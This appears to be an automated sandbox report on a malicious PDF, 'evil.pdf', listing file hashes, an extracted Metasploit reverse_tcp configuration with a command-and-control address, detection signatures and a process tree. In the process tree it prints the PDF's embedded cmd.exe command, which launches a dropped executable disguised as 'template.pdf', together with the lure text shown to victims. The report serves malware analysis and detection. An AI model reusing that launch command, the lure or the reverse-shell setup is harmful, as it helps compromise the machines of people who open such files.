Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    17-05-2024 18:12

General

  • Target

    evil.pdf

  • Size

    45KB

  • MD5

    c6ca50ccdaf2ef75643219163577757b

  • SHA1

    7c14123f39d5c137e3d4412c392c962c29fcb7f7

  • SHA256

    d59e9f301dc89d6e45cd695d8274bcaac4ed6b745369c3455c4343fdc61819b4

  • SHA512

    d1c5ec9fa2ffa4f89e9658e0cc9b733f23c9e03252353eac9d7d1ade720af889ee950e1162be9e55c0a19fd678abd095e39e5fb6fe65542f55afd0b9729e24e2

  • SSDEEP

    768:cd/lECC1jelyqCs2u3jx/Top3CAzf2sNGA3TV3k+zmQpEXtUROwr4XGtLIbuXwkT:c8xoLCBuTqhTzuI3TVnJwwr8buXlZ

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

146.19.191.45:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies registry class 31 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\evil.pdf"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\template.pdf" (cd "Desktop"))&(if exist "My Documents\template.pdf" (cd "My Documents"))&(if exist "Documents\template.pdf" (cd "Documents"))&(if exist "Escritorio\template.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\template.pdf" (cd "Mis Documentos"))&(start template.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2716
      • \??\c:\Users\Admin\Documents\template.pdf
        template.pdf
        3⤵
        • Executes dropped EXE
        PID:2948

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
    Filesize

    3KB

    MD5

    68f7c7901ab55a89c646c30d9404ae9c

    SHA1

    7280fdb779ea6c2ec93a94550af9cc8bb150889a

    SHA256

    2f5035cc3eddf5a8cf4bc6dee82e81ec703104d28f42a6350a643af5c1f872c7

    SHA512

    d053f8f9f7eeb476a06898d24d027e6a9d4d832193383babb35b907b879fbf62a45f1a2efbf5840821a0d48a3ddade80bff835b644bdd937335092a9c16835c4

  • C:\Users\Admin\Documents\template.pdf
    Filesize

    72KB

    MD5

    a0dadf4c06912afefea51d1d856a3eff

    SHA1

    a0e23b70d0d1e9880c4129f2a7b65133b72f8738

    SHA256

    5cfe86dcaed78ccabd079cb809786104314f73d5127c3ed6814bac9b1374fce8

    SHA512

    491fd6fe42e2856c9ff59d950cf7330f10e3ec969dcfe4c670e2e75931ecb5049a7c765dea23f4a4db64ea2f7075dd64f43a3b3a257876c72e8553ad433d3af8

  • memory/2292-0-0x00000000070E0000-0x0000000007B9A000-memory.dmp
    Filesize

    10.7MB